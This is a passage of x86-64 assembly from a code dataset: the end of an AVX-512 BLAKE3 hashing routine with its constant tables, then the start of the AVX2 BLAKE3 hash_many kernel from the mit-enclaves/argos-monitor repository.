vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
vextracti128 XMMWORD PTR [r9+0x40],ymm0,0x1
vextracti128 XMMWORD PTR [r9+0x50],ymm1,0x1
vextracti128 XMMWORD PTR [r9+0x60],ymm2,0x1
vextracti128 XMMWORD PTR [r9+0x70],ymm3,0x1
vextracti32x4 XMMWORD PTR [r9+0x80],zmm0,0x2
vextracti32x4 XMMWORD PTR [r9+0x90],zmm1,0x2
vextracti32x4 XMMWORD PTR [r9+0xa0],zmm2,0x2
vextracti32x4 XMMWORD PTR [r9+0xb0],zmm3,0x2
vextracti32x4 XMMWORD PTR [r9+0xc0],zmm0,0x3
vextracti32x4 XMMWORD PTR [r9+0xd0],zmm1,0x3
vextracti32x4 XMMWORD PTR [r9+0xe0],zmm2,0x3
vextracti32x4 XMMWORD PTR [r9+0xf0],zmm3,0x3
vmovdqa xmm0,XMMWORD PTR [rsp+0x10]
vmovdqa xmm1,XMMWORD PTR [rsp+0x50]
vmovdqa XMMWORD PTR [rsp],xmm0
vmovdqa XMMWORD PTR [rsp+0x40],xmm1
add r9,0x100
sub r10,0x4
2:
test r10,0x2
je 2f
vbroadcasti128 ymm0,XMMWORD PTR [rdi]
vbroadcasti128 ymm1,XMMWORD PTR [rdi+0x10]
vmovd xmm13,DWORD PTR [rsp]
vpinsrd xmm13,xmm13,DWORD PTR [rsp+0x40],0x1
vpinsrd xmm13,xmm13,edx,0x2
vmovd xmm14,DWORD PTR [rsp+0x4]
vpinsrd xmm14,xmm14,DWORD PTR [rsp+0x44],0x1
vpinsrd xmm14,xmm14,edx,0x2
vinserti128 ymm13,ymm13,xmm14,0x1
vbroadcasti128 ymm2,XMMWORD PTR [BLAKE3_IV+rip]
vpbroadcastd ymm8,r8d
vpblendd ymm3,ymm13,ymm8,0x88
vbroadcasti128 ymm8,XMMWORD PTR [rsi]
vbroadcasti128 ymm9,XMMWORD PTR [rsi+0x10]
vshufps ymm4,ymm8,ymm9,0x88
vshufps ymm5,ymm8,ymm9,0xdd
vbroadcasti128 ymm8,XMMWORD PTR [rsi+0x20]
vbroadcasti128 ymm9,XMMWORD PTR [rsi+0x30]
vshufps ymm6,ymm8,ymm9,0x88
vshufps ymm7,ymm8,ymm9,0xdd
vpshufd ymm6,ymm6,0x93
vpshufd ymm7,ymm7,0x93
mov al,0x7
3:
vpaddd ymm0,ymm0,ymm4
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x10
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0xc
vpaddd ymm0,ymm0,ymm5
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x8
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0x7
vpshufd ymm0,ymm0,0x93
vpshufd ymm3,ymm3,0x4e
vpshufd ymm2,ymm2,0x39
vpaddd ymm0,ymm0,ymm6
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x10
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0xc
vpaddd ymm0,ymm0,ymm7
vpaddd ymm0,ymm0,ymm1
vpxord ymm3,ymm3,ymm0
vprord ymm3,ymm3,0x8
vpaddd ymm2,ymm2,ymm3
vpxord ymm1,ymm1,ymm2
vprord ymm1,ymm1,0x7
vpshufd ymm0,ymm0,0x39
vpshufd ymm3,ymm3,0x4e
vpshufd ymm2,ymm2,0x93
dec al
je 3f
vshufps ymm8,ymm4,ymm5,0xd6
vpshufd ymm9,ymm4,0xf
vpshufd ymm4,ymm8,0x39
vshufps ymm8,ymm6,ymm7,0xfa
vpblendd ymm9,ymm9,ymm8,0xaa
vpunpcklqdq ymm8,ymm7,ymm5
vpblendd ymm8,ymm8,ymm6,0x88
vpshufd ymm8,ymm8,0x78
vpunpckhdq ymm5,ymm5,ymm7
vpunpckldq ymm6,ymm6,ymm5
vpshufd ymm7,ymm6,0x1e
vmovdqa ymm5,ymm9
vmovdqa ymm6,ymm8
jmp 3b
3:
vpxor ymm0,ymm0,ymm2
vpxor ymm1,ymm1,ymm3
vbroadcasti128 ymm8,XMMWORD PTR [rdi]
vbroadcasti128 ymm9,XMMWORD PTR [rdi+0x10]
vpxor ymm2,ymm2,ymm8
vpxor ymm3,ymm3,ymm9
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
vextracti128 XMMWORD PTR [r9+0x40],ymm0,0x1
vextracti128 XMMWORD PTR [r9+0x50],ymm1,0x1
vextracti128 XMMWORD PTR [r9+0x60],ymm2,0x1
vextracti128 XMMWORD PTR [r9+0x70],ymm3,0x1
vmovdqu xmm0,XMMWORD PTR [rsp+0x8]
vmovdqu xmm1,XMMWORD PTR [rsp+0x48]
vmovdqa XMMWORD PTR [rsp],xmm0
vmovdqa XMMWORD PTR [rsp+0x40],xmm1
add r9,0x80
sub r10,0x2
2:
test r10,0x1
je 9b
vmovdqu xmm0,XMMWORD PTR [rdi]
vmovdqu xmm1,XMMWORD PTR [rdi+0x10]
vmovd xmm14,DWORD PTR [rsp]
vpinsrd xmm14,xmm14,DWORD PTR [rsp+0x40],0x1
vpinsrd xmm14,xmm14,edx,0x2
vmovdqa xmm2,XMMWORD PTR [BLAKE3_IV+rip]
vpinsrd xmm3,xmm14,r8d,0x3
vmovups xmm8,XMMWORD PTR [rsi]
vmovups xmm9,XMMWORD PTR [rsi+0x10]
vshufps xmm4,xmm8,xmm9,0x88
vshufps xmm5,xmm8,xmm9,0xdd
vmovups xmm8,XMMWORD PTR [rsi+0x20]
vmovups xmm9,XMMWORD PTR [rsi+0x30]
vshufps xmm6,xmm8,xmm9,0x88
vshufps xmm7,xmm8,xmm9,0xdd
vpshufd xmm6,xmm6,0x93
vpshufd xmm7,xmm7,0x93
mov al,0x7
3:
vpaddd xmm0,xmm0,xmm4
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm5
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x93
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x39
vpaddd xmm0,xmm0,xmm6
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm7
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x39
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x93
dec al
je 3f
vshufps xmm8,xmm4,xmm5,0xd6
vpshufd xmm9,xmm4,0xf
vpshufd xmm4,xmm8,0x39
vshufps xmm8,xmm6,xmm7,0xfa
vpblendd xmm9,xmm9,xmm8,0xaa
vpunpcklqdq xmm8,xmm7,xmm5
vpblendd xmm8,xmm8,xmm6,0x88
vpshufd xmm8,xmm8,0x78
vpunpckhdq xmm5,xmm5,xmm7
vpunpckldq xmm6,xmm6,xmm5
vpshufd xmm7,xmm6,0x1e
vmovdqa xmm5,xmm9
vmovdqa xmm6,xmm8
jmp 3b
3:
vpxor xmm0,xmm0,xmm2
vpxor xmm1,xmm1,xmm3
vpxor xmm2,xmm2,XMMWORD PTR [rdi]
vpxor xmm3,xmm3,XMMWORD PTR [rdi+0x10]
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
jmp 9b
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
.p2align 6
INDEX0:
.long 0, 1, 2, 3, 16, 17, 18, 19
.long 8, 9, 10, 11, 24, 25, 26, 27
INDEX1:
.long 4, 5, 6, 7, 20, 21, 22, 23
.long 12, 13, 14, 15, 28, 29, 30, 31
ADD0:
.long 0, 1, 2, 3, 4, 5, 6, 7
.long 8, 9, 10, 11, 12, 13, 14, 15
ADD1: .long 1
ADD16: .long 16
BLAKE3_BLOCK_LEN:
.long 64
.p2align 6
BLAKE3_IV:
BLAKE3_IV_0:
.long 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A
|
mit-enclaves/argos-monitor | 66,050 | C/libraries/sdktyche/loader/blake3_avx2_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global _blake3_hash_many_avx2
.global blake3_hash_many_avx2
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_avx2:
blake3_hash_many_avx2:
_CET_ENDBR
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 680
and rsp, 0xFFFFFFFFFFFFFFC0
neg r9d
vmovd xmm0, r9d
vpbroadcastd ymm0, xmm0
vmovdqa ymmword ptr [rsp+0x280], ymm0
vpand ymm1, ymm0, ymmword ptr [ADD0+rip]
vpand ymm2, ymm0, ymmword ptr [ADD1+rip]
vmovdqa ymmword ptr [rsp+0x220], ymm2
vmovd xmm2, r8d
vpbroadcastd ymm2, xmm2
vpaddd ymm2, ymm2, ymm1
vmovdqa ymmword ptr [rsp+0x240], ymm2
vpxor ymm1, ymm1, ymmword ptr [CMP_MSB_MASK+rip]
vpxor ymm2, ymm2, ymmword ptr [CMP_MSB_MASK+rip]
vpcmpgtd ymm2, ymm1, ymm2
shr r8, 32
vmovd xmm3, r8d
vpbroadcastd ymm3, xmm3
vpsubd ymm3, ymm3, ymm2
vmovdqa ymmword ptr [rsp+0x260], ymm3
shl rdx, 6
mov qword ptr [rsp+0x2A0], rdx
cmp rsi, 8
jc 3f
2:
vpbroadcastd ymm0, dword ptr [rcx]
vpbroadcastd ymm1, dword ptr [rcx+0x4]
vpbroadcastd ymm2, dword ptr [rcx+0x8]
vpbroadcastd ymm3, dword ptr [rcx+0xC]
vpbroadcastd ymm4, dword ptr [rcx+0x10]
vpbroadcastd ymm5, dword ptr [rcx+0x14]
vpbroadcastd ymm6, dword ptr [rcx+0x18]
vpbroadcastd ymm7, dword ptr [rcx+0x1C]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x20]
mov r13, qword ptr [rdi+0x28]
mov r14, qword ptr [rdi+0x30]
mov r15, qword ptr [rdi+0x38]
movzx eax, byte ptr [rbp+0x38]
movzx ebx, byte ptr [rbp+0x40]
or eax, ebx
xor edx, edx
.p2align 5
9:
movzx ebx, byte ptr [rbp+0x48]
or ebx, eax
add rdx, 64
cmp rdx, qword ptr [rsp+0x2A0]
cmove eax, ebx
mov dword ptr [rsp+0x200], eax
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x40], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x40]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x40], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x40]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x40], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x40]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x40], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0x20], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0x40], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0x60], ymm11
vmovups xmm8, xmmword ptr [r8+rdx-0x30]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x30], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x30], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x30]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x30], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x30]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x30], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp+0x80], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0xA0], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0xC0], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0xE0], ymm11
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x20], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x20]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x20], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x20]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x20], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x20]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x20], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp+0x100], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0x120], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0x140], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0x160], ymm11
vmovups xmm8, xmmword ptr [r8+rdx-0x10]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x10], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x10], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x10]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x10], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x10]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x10], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp+0x180], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0x1A0], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0x1C0], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0x1E0], ymm11
vpbroadcastd ymm15, dword ptr [rsp+0x200]
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r12+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r13+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r14+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
prefetcht0 [r15+rdx+0x80]
vpaddd ymm0, ymm0, ymmword ptr [rsp]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x40]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x80]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm0, ymmword ptr [rsp+0x240]
vpxor ymm13, ymm1, ymmword ptr [rsp+0x260]
vpxor ymm14, ymm2, ymmword ptr [BLAKE3_BLOCK_LEN+rip]
vpxor ymm15, ymm3, ymm15
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [BLAKE3_IV_0+rip]
vpaddd ymm9, ymm13, ymmword ptr [BLAKE3_IV_1+rip]
vpaddd ymm10, ymm14, ymmword ptr [BLAKE3_IV_2+rip]
vpaddd ymm11, ymm15, ymmword ptr [BLAKE3_IV_3+rip]
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x20]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x60]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xA0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x100]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x180]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1C0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x120]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1A0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x40]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x60]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xE0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x80]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xC0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1A0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x20]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x120]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x160]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1C0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
